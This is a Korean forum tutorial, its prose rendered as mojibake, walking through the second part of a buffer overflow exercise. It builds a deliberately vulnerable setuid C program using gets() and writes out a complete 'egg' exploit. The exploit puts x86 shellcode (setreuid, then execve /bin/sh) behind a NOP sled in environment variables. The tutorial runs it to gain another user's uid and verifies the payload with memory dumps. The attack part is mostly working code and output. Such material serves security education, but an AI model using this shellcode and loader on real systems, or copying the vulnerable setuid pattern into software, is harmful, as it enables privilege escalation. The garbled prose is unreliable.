1581, 1/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ssuckies
   http://www.ganseo.com
   BOF ÇØ°á ¹«ÀÛÁ¤ µû¶óÇϱâ #2

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=182 [º¹»ç]


Produced by ganseo
e-mail : postmaster@ganseo.com
homepage : http://www.ganseo.com

À̾ µÎ¹ø° ¹æ¹ýÀÔ´Ï´Ù.
¹®¼­ÀÛ¾÷ÀÌ È®½ÇÈ÷ ½±Áø ¾Ê³×¿ä...¤Ñ_¤Ñ;
À̹ø ¹öÁ¯Àº eggÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ´Â °ÍÀÔ´Ï´Ù.
ÀÌ ¹®¼­ºÎÅÍ º¸½ÅºÐÀº ¾Æ·¡Àִ ù¹ø° ¹®¼­ºÎÅÍ º¸¼¼¿ä^^

ÀÏ´Ü eggÇÁ·Î±×·¥¿¡ ´ëÇؼ­ °£´ÜÈ÷ ¼³¸íµå¸®ÀÚ¸é ȯ°æº¯¼ö¿¡ ½©Äڵ带 ¿Ã·Á ³õ°í ±× ÁÖ¼Ò¸¦ °¡¸®Å°´Â
ret¸¦ ÂÒ¾Ç ³Ö¾îµÎ°í ±×°Íµµ ¿ª½¬ ȯ°æº¯¼ö¿¡ ¿Ã·ÁµÖ¼­ ½±°Ô Ç®¼ö ÀÖ°Ô ¸¸µç°ÍÀÔ´Ï´Ù.
ÀÏ´Ü ÀÌ°ÍÀ¸·Î Çϴ°ÍÀº ¸Å¿ì ½±±â¶§¹®¿¡ ÀúÈñ´Â ÀÏ´Ü ¹®Á¦ Ç®°í ȯ°æº¯¼ö ºÎºÐÀ» ´ýÇÁÇؼ­ °ú¿¬ Àßµé¾î°¡ ÀÖ´ÂÁö¸¦
±¸°æÇÏ´Â ÂÊÀ¸·Î ¹®¼­¸¦ ÀÛ¼ºÇÒ±î ÇÕ´Ï´Ù.^_^

ù¹ø° ¹®¼­¿Í ¶È°°Àº ÇÁ·Î±×·¥À¸·Î Å×½ºÆ® Çغ¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
[root@localhost .test]# cat > testApp.c        
#include <stdio.h>
void main(int argc , char** argv)
{
        char buffer[200];

        printf("type ur words : ");
        gets(buffer);
        printf("words = %s\n" , buffer);
}
[root@localhost .test]# gcc -o testApp testApp.c
testApp.c: In function `main':
testApp.c:3: warning: return type of `main' is not `int'
/tmp/ccFrX0ch.o: In function `main':
/tmp/ccFrX0ch.o(.text+0x24): the `gets' function is dangerous and should not be used.
[root@localhost .test]# chmod 4750 testApp
[root@localhost .test]# chown recluse8 testApp
[root@localhost .test]# chgrp recluse7 testApp
[root@localhost .test]# ls -al
ÇÕ°è 28
drwxr-xr-x    2 root     root         4096  4¿ù 10 00:08 .
drwxr-xr-x   21 root     root         4096  4¿ù  9 23:17 ..
-rwsr-x---    1 recluse8 recluse7    13842  4¿ù 10 00:08 testApp
-rw-r--r--    1 root     root          155  4¿ù 10 00:08 testApp.c
[root@localhost .test]#

[root@localhost .test]# (perl -e 'print "A"x300';cat)|./testApp

type ur words : words = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

¼¼±×¸àÅ×ÀÌ¼Ç ¿À·ù
[root@localhost .test]#

ÀÚ ÀÌÁ¦ egg.c ÇÁ·Î±×·¥À» Çѹø º¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
ÀÏ´Ü ½©Äڵ忡 id¸¦ ³Ö±â À§ÇØ recluse8ÀÇ id¸¦ ¾Ë¾Æº¾´Ï´Ù.
(½©ÄÚµå ¸¸µå´Â ¹æ¹ýÀº ³Î·çÆ®ÀÇ ¸ÚÁøºÐµéÀÌ(^^) ½áµÐ ¹®¼­¸¦ Âü°íÇϼ¼¿ä. ganseo.com¿¡µµ ÆÛ´Ù³ù½À´Ï´Ù.)
[root@localhost .test]# id recluse8
uid=1008(recluse8) gid=1008(recluse8) groups=1008(recluse8)
[root@localhost .test]# cat > egg.c
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\x31\xc9"                   /*xor    %ecx,%ecx*/
  "\x66\xb9\xf0\x03"             /*mov    $0x3f0,%cx*/                //recluse8ÀÇ id¸¦ ³Ö¾îÁÝ´Ï´Ù.
  "\x31\xdb"                   /*xor    %ebx,%ebx*/
  "\x66\xbb\xf0\x03"             /*mov    $0x3f0,%bx*/                //¿©±â¿¡´Ù°¡µµ ³Ö¾îÁÝ´Ï´Ù.
  "\x31\xc0"                   /*xor    %eax,%eax*/
  "\xb0\x46"                   /*mov    $0x46,%al*/
  "\xcd\x80"                        /*int    $0x80*/
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";



unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;                        //¿ì¸®°¡ ret address·Î »ç¿ëÇÒ ÁÖ¼ÒÀÔ´Ï´Ù.¹öÆÛ »çÀÌÁ egg»çÀÌÁî¿¡ µû¶ó »ì¦ Á¶Á¤ÇØÁÖ¸é µË´Ï´Ù.
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  {
          
                  *(addr_ptr++) = addr;                //¿ì¸®°¡ »ç¿ëÇÒ ret¸¦ ȯ°æº¯¼ö $RET¿¡ ³Ö±âÀ§ÇØ ÁغñÁßÀÔ´Ï´Ù.
  }
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;                                //½©ÄÚµå Àü¿¡ NOPÀ¸·Î ü¿ö¼­ ´ëÃæÂï¾îµµ ½©Äڵ尡 ½ÇÇàµÇ°Ô ÇÏ·ÁÇÕ´Ï´Ù.

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];                        //Áß¿äÇÑ ½©Äڵ带 Áغñ!

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  //$EGG ¿¡ egg shellÀ» ³Ö½À´Ï´Ù.
  memcpy(egg,"EGG=",4);                                
  putenv(egg);
  //$RET ¿¡ ¿ì¸®°¡ »ç¿ëÇÒ ret address¸¦ ³Ö½À´Ï´Ù.
  memcpy(buff,"RET=",4);
  putenv(buff);
  
  //ȯ°æº¯¼ö µî·ÏÀÌ ³¡³ª°í ³ª¸é bash¸¦ ¶ç¿ó´Ï´Ù.
  system("/bin/bash");
}
[root@localhost .test]# gcc -o egg egg.c
[root@localhost .test]#
[root@localhost .test]# ./egg        //eggÇÁ·Î±×·¥À» ¶ç¿ó´Ï´Ù. buffer»çÀÌÁî°¡ 512º¸´Ù Å©´Ù¸é argv·Î Á¶ÀýÇØ ÁÖ¾î¾ß ÇÏ°ÚÁö¸¸ Áö±ÝÀº 200À̱⿡ µðÆÞÆ®!
Using address: 0xbffffa78
[root@localhost .test]# ps        //ÇÁ·Î¼¼½º¿¡ egg°¡ ¶°ÀÖ´ÂÁö È®ÀÎÇغ¾´Ï´Ù.
  PID TTY          TIME CMD
4316 pts/1    00:00:00 bash
4421 pts/1    00:00:00 egg
4422 pts/1    00:00:00 bash
4445 pts/1    00:00:00 ps
[root@localhost .test]#
[recluse7@localhost .test]$ (printf $RET;cat)|./testApp                //exploit!

type ur words : words = x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?

id
uid=1008(recluse8) gid=1007(recluse7) groups=1007(recluse7)        //Àß µÇ´Â±º¿ä
exit

¿ª½Ã eggÇÁ·Î±×·¥À» »ç¿ëÇϴ°ÍÀº ½±½À´Ï´Ù.
egg¸¦ »ç¿ëÇÏ´Â ½À°üÀº º°·Î ÁÁÁö´Â ¾ÊÀº°Í °°½À´Ï´Ù.
óÀ½¿¡´Â Â÷±ÙÂ÷±Ù Á¤È®ÇÑ ret¸¦ ¾Ë¾Æ³»¼­ ¸Þ¸ð¸® ´ýÇÁÇغ¸¸é¼­ ÇÏ´Â°Ô ³ªÀ¸½Çµí ÇÕ´Ï´Ù.
gdb·Î ¸Þ¸ð¸® ¿©Ç൵ ÁÁÀ»µí.


ÀÏ´Ü ±×·¯¸é óÀ½¿¡ ¸»¾¸µå¸°´ë·Î ȯ°æº¯¼ö¿¡ ÀúÈñ°¡ Áý¾î ³ÖÀº egg shell code¿Í ret address°¡ µé¾î°¡ ÀÖ´ÂÁö È®ÀÎÇÏ´Â ÇÁ·Î±×·¥À» µ¹·Áº¸°Ú½À´Ï´Ù.
¹°·Ð ÇÁ·Î±×·¥Àº ´ë´ÜÈ÷ °£´ÜÇÕ´Ï´Ù.
[root@localhost .test]# exit
[root@localhost .test]# ps
  PID TTY          TIME CMD
4316 pts/1    00:00:00 bash
4516 pts/1    00:00:00 ps

dumpcode Çì´õ¸¦ includeÇϱâÀ§ÇØ...
[root@localhost .test]# cat > dumpcode.h
void printchar(unsigned char c)
{
     if(isprint(c))
             printf("%c",c);
     else
             printf(".");
}
void dumpcode(unsigned char *buff, int len)
{
     int i;
     for(i=0;i<len;i++)
     {
             if(i%16==0)
                     printf("0x%08x  ",&buff[i]);
             printf("%02x ",buff[i]);
             if(i%16-15==0)
             {
                     int j;
                     printf("  ");
                     for(j=i-15;j<=i;j++)
                             printchar(buff[j]);
                     printf("\n");
             }
     }
     if(i%16!=0)
     {
             int j;
             int spaces=(len-i+16-i%16)*3+2;
             for(j=0;j<spaces;j++)
                     printf(" ");
             for(j=i-i%16;j<len;j++)
                     printchar(buff[j]);
     }
     printf("\n");
}

´ýÇÁ¸â ÇÁ·Î±×·¥À» ¸¸µé¾î º¸¾Ò½À´Ï´Ù. ÀÎÀÚ ¹Þ°í ¾î¼°í ÇÏ´Â ÀÌ»Ú°Ô ¸¸µå½Ã´Â°ÍÀº ½º½º·Î...Àü ±ÍÂú¾Æ¼­·ò^_^
[root@localhost .test]# cat > dumpmem.c
#include <stdio.h>
#include "dumpcode.h"
main( int argc, char **argv)
{
        if ( argc >1 )
        {
                dumpcode( (char *)0xbffffa78 + atoi( argv[1] ),1000 );
        }
}
[root@localhost .test]# gcc -o dumpmem dumpmem.c
[root@localhost .test]#
ÀÏ´Ü eggÇÁ·Î±×·¥ µ¹¸®±â Àü¿¡ ȯ°æº¯¼ö ºÎºÐÀ» º¸µµ·Ï ÇÏ°Ú½À´Ï´Ù.
[root@localhost .test]# ./dumpmem -100
0xbffffa14  04 fb ff bf 38 fa ff bf 02 7a 08 40 00 80 15 40   ...@8...........
0xbffffa24  9d 87 04 08 48 fa ff bf 06 00 00 00 ff ff ff ff   ....D...........
0xbffffa34  d0 9f 15 40 78 fa ff bf 78 85 04 08 a6 87 04 08   ....x...........
0xbffffa44  44 00 00 00 01 00 00 00 d0 9f 15 40 4c 5e 01 40   @..........@L^.@
0xbffffa54  04 fb ff bf 78 fa ff bf c3 9a 05 40 1a fc ff bf   ....x......@....
0xbffffa64  4f 00 00 00 53 00 00 00 00 00 00 00 50 00 00 00   _..._.......\...
0xbffffa74  60 00 00 00 98 fa ff bf 25 87 04 08 14 fa ff bf   o.......%.......
0xbffffa84  e8 03 00 00 a8 fa ff bf b1 84 04 08 c4 97 04 08   ................
0xbffffa94  cc 98 04 08 d8 fa ff bf 06 63 04 40 02 00 00 00   .........c.@....
0xbffffaa4  04 fb ff bf 10 fb ff bf 42 83 04 08 70 87 04 08   ........B...p...
0xbffffab4  00 00 00 00 d8 fa ff bf f2 62 04 40 00 00 00 00   .........b.@....
0xbffffac4  10 fb ff bf c0 8a 15 40 58 58 01 40 02 00 00 00   .......@XX.@....
0xbffffad4  d0 83 04 08 00 00 00 00 f1 83 04 08 f4 86 04 08   ................
0xbffffae4  02 00 00 00 04 fb ff bf 2c 83 04 08 70 87 04 08   ........,...p...
0xbffffaf4  cc d2 00 40 fc fa ff bf ac 5e 01 40 02 00 00 00   ...@.....^.@....
0xbffffb04  10 fc ff bf 1a fc ff bf 00 00 00 00 1f fc ff bf   ................
0xbffffb14  2a fc ff bf 49 fc ff bf 5b fc ff bf 7d fc ff bf   *...I...[...}...
0xbffffb24  89 fc ff bf 93 fc ff bf 56 fe ff bf 75 fe ff bf   ........V...u...
0xbffffb34  88 fe ff bf a2 fe ff bf b7 fe ff bf ce fe ff bf   ................
0xbffffb44  e1 fe ff bf f2 fe ff bf ff fe ff bf 07 ff ff bf   ................
0xbffffb54  17 ff ff bf 25 ff ff bf 33 ff ff bf 3d ff ff bf   ....%...3...=...
0xbffffb64  4e ff ff bf 5c ff ff bf 67 ff ff bf 72 ff ff bf   N...\...g...r...
0xbffffb74  cd ff ff bf dd ff ff bf e9 ff ff bf 00 00 00 00   ................
0xbffffb84  10 00 00 00 ff f9 83 03 06 00 00 00 00 10 00 00   ................
0xbffffb94  11 00 00 00 64 00 00 00 03 00 00 00 34 80 04 08   ....d.......4...
0xbffffba4  04 00 00 00 20 00 00 00 05 00 00 00 06 00 00 00   .... ...........
0xbffffbb4  07 00 00 00 00 00 00 40 08 00 00 00 00 00 00 00   .......@........
0xbffffbc4  09 00 00 00 d0 83 04 08 0b 00 00 00 00 00 00 00   ................
0xbffffbd4  0c 00 00 00 00 00 00 00 0d 00 00 00 00 00 00 00   ................
0xbffffbe4  0e 00 00 00 00 00 00 00 0f 00 00 00 0b fc ff bf   ................
0xbffffbf4  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0xbffffc04  00 00 00 00 00 00 00 69 36 38 36 00 2e 2f 64 75   .......i686../du                //¿©±â¿¡ argv[0]ÀÌ µé¾î°¡³×¿ä. ³ªÁß¿¡ format stringÇÒ¶§ ¾²±âµµ ÇÕ´Ï´Ù.
0xbffffc14  6d 70 6d 65 6d 00 2d 31 30 30 00 50 57 44 3d 2f   mpmem.-100.PWD=/                //ȯ°æº¯¼ö ºÎºÐÀÌÁÒ^^
0xbffffc24  2e 74 65 73 74 00 48 4f 53 54 4e 41 4d 45 3d 6c   .test.HOSTNAME=l
0xbffffc34  6f 63 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f   ocalhost.localdo
0xbffffc44  6d 61 69 6e 00 51 54 44 49 52 3d 2f 75 73 72 2f   main.QTDIR=/usr/
0xbffffc54  6c 69 62 2f 71 74 00 4c 45 53 53 4f 50 45 4e 3d   lib/qt.LESSOPEN=
0xbffffc64  7c 2f 75 73 72 2f 62 69 6e 2f 6c 65 73 73 70 69   |/usr/bin/lesspi
0xbffffc74  70 65 2e 73 68 20 25 73 00 4b 44 45 44 49 52 3d   pe.sh %s.KDEDIR=
0xbffffc84  2f 75 73 72 00 55 53 45 52 3d 72 6f 6f 74 00 4c   /usr.USER=root.L
0xbffffc94  53 5f 43 4f 4c 4f 52 53 3d 6e 6f 3d 30 30 3a 66   S_COLORS=no=00:f
0xbffffca4  69 3d 30 30 3a 64 69 3d 30 31 3b 33 34 3a 6c 6e   i=00:di=01;34:ln
0xbffffcb4  3d 30 31 3b 33 36 3a 70 69 3d 34 30 3b 33 33 3a   =01;36:pi=40;33:
0xbffffcc4  73 6f 3d 30 31 3b 33 35 3a 62 64 3d 34 30 3b 33   so=01;35:bd=40;3
0xbffffcd4  33 3b 30 31 3a 63 64 3d 34 30 3b 33 33 3b 30 31   3;01:cd=40;33;01
0xbffffce4  3a 6f 72 3d 30 31 3b 30 35 3b 33 37 3b 34 31 3a   :or=01;05;37;41:
0xbffffcf4  6d 69 3d 30 31 3b 30 35 3b 33 37 3b 34 31 3a 65   mi=01;05;37;41:e
0xbffffd04  78 3d 30 31 3b 33 32 3a 2a 2e 63 6d 64 3d 30 31   x=01;32:*.cmd=01
0xbffffd14  3b 33 32 3a 2a 2e 65 78 65 3d 30 31 3b 33 32 3a   ;32:*.exe=01;32:
0xbffffd24  2a 2e 63 6f 6d 3d 30 31 3b 33 32 3a 2a 2e 62 74   *.com=01;32:*.bt
0xbffffd34  6d 3d 30 31 3b 33 32 3a 2a 2e 62 61 74 3d 30 31   m=01;32:*.bat=01
0xbffffd44  3b 33 32 3a 2a 2e 73 68 3d 30 31 3b 33 32 3a 2a   ;32:*.sh=01;32:*
0xbffffd54  2e 63 73 68 3d 30 31 3b 33 32 3a 2a 2e 74 61 72   .csh=01;32:*.tar
0xbffffd64  3d 30 31 3b 33 31 3a 2a 2e 74 67 7a 3d 30 31 3b   =01;31:*.tgz=01;
0xbffffd74  33 31 3a 2a 2e 61 72 6a 3d 30 31 3b 33 31 3a 2a   31:*.arj=01;31:*
0xbffffd84  2e 74 61 7a 3d 30 31 3b 33 31 3a 2a 2e 6c 7a 68   .taz=01;31:*.lzh
0xbffffd94  3d 30 31 3b 33 31 3a 2a 2e 7a 69 70 3d 30 31 3b   =01;31:*.zip=01;
0xbffffda4  33 31 3a 2a 2e 7a 3d 30 31 3b 33 31 3a 2a 2e 5a   31:*.z=01;31:*.Z
0xbffffdb4  3d 30 31 3b 33 31 3a 2a 2e 67 7a 3d 30 31 3b 33   =01;31:*.gz=01;3
0xbffffdc4  31 3a 2a 2e 62 7a 32 3d 30 31 3b 33 31 3a 2a 2e   1:*.bz2=01;31:*.
0xbffffdd4  62 7a 3d 30 31 3b 33 31 3a 2a 2e 74 7a 3d 30 31   bz=01;31:*.tz=01
0xbffffde4  3b 33 31 3a 2a 2e 72 70 6d 3d 30 31 3b 33 31 3a   ;31:*.rpm=01;31:
0xbffffdf4  2a 2e 63 70 69 6f 3d 30                           *.cpio=0
[root@localhost .test]#
eggÇÁ·Î±×·¥À» ¶ç¿ü½À´Ï´Ù.
[root@localhost .test]# ./egg
Using address: 0xbffffa78                //¿ì¸®°¡ »ç¿ëÇÒ ret address ÁÖº¯À» ´ýÇÁÇغ¼ ¿¹Á¤ÀÔ´Ï´Ù.
ÀÏ´Ü È¯°æº¯¼ö¸¦ º¸°Ú½À´Ï´Ù.
[root@localhost .test]# env
PWD=/.test
HOSTNAME=localhost.localdomain
QTDIR=/usr/lib/qt
LESSOPEN=|/usr/bin/lesspipe.sh %s
KDEDIR=/usr
USER=root
LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:
MACHTYPE=i386-redhat-linux-gnu
LC_ALL=ko_KR.euckr
EGG=1?¹ð1?»ð1À°FÍë^1ÀFF  V
                         ?N?ÛØ@Íè?ÿÿ/bin/sh
MAIL=/var/spool/mail/root ?
INPUTRC=/etc/inputrc
RET=x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?¿x?
BASH_ENV=/root/.bashrc
XMODIFIERS=@im=Ami
LANG=ko_KR.eucKR
LOGNAME=root
SHLVL=3
SHELL=/bin/bash
USERNAME=root
HOSTTYPE=i386
QT_XFT=no
OSTYPE=linux-gnu
HISTSIZE=1000
HOME=/root
TERM=vt100
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/bin:/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin
JLESSCHARSET=ko
_=/usr/bin/env
[root@localhost .test]#
Àß µé¾î°¡ ÀÖ±â´Â Çϳ׿ä.
±×·³ ÀÌÁ¦ ¿ì¸®°¡ ¿øÇÏ´Â ºÎºÐ¿¡ µé¾î°¡ ÀÖ´ÂÁö È®ÀÎ Çϵµ·Ï ÇÏ°Ú½À´Ï´Ù.
[root@localhost .test]# ./dumpmem -100
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................                //NOPÀÌ µé¾î°¡ ÀÖ°í ¹Ø¿¡ ½©Äڵ尡 ³ª¿À´Ï Á¦´ë·Î³×¿ä^^
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffb94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffba4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbb4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbc4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbd4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbe4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffbf4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffc44  90 90 90 90 90 90 90 90 90 90 90 90 90 31 c9 66   .............1.f                //½©ÄÚµå ºÎºÐ
0xbffffc54  b9 f0 03 31 db 66 bb f0 03 31 c0 b0 46 cd 80 eb   ...1.f...1..F...
0xbffffc64  1f 5e 89 76 08 31 c0 88 46 07 89 46 0c b0 0b 89   .^.v.1..F..F....
0xbffffc74  f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd 80   ..N..V...1...@..
0xbffffc84  e8 dc ff ff ff 2f 62 69 6e 2f 73 68 00 4d 41 49   ...../bin/sh.MAI
0xbffffc94  4c 3d 2f 76 61 72 2f 73 70 6f 6f 6c 2f 6d 61 69   L=/var/spool/mai
0xbffffca4  6c 2f 72 6f 6f 74 00 49 4e 50 55 54 52 43 3d 2f   l/root.INPUTRC=/
0xbffffcb4  65 74 63 2f 69 6e 70 75 74 72 63 00 52 45 54 3d   etc/inputrc.RET=                //ȯ°æº¯¼ö¿¡ RET°¡ Àßµé¾î°¡ Àֳ׿ä^^ °¡¸®Å°´Â 0xbffffa78 µµ È®½ÇÇÏ°í...
0xbffffcc4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffcd4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffce4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffcf4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd04  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd14  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd24  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd34  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd44  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd54  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd64  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd74  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd84  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffd94  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffda4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffdb4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffdc4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffdd4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffde4  78 fa ff bf 78 fa ff bf 78 fa ff bf 78 fa ff bf   x...x...x...x...
0xbffffdf4  78 fa ff bf 78 fa ff bf                           x...x...
[root@localhost .test]#
ÀÚ ³¡ÀÔ´Ï´Ù.
¤Ñ_¤Ñ;
º°°Å ¾ø³×¿ä...
ÇÏÇÏ...
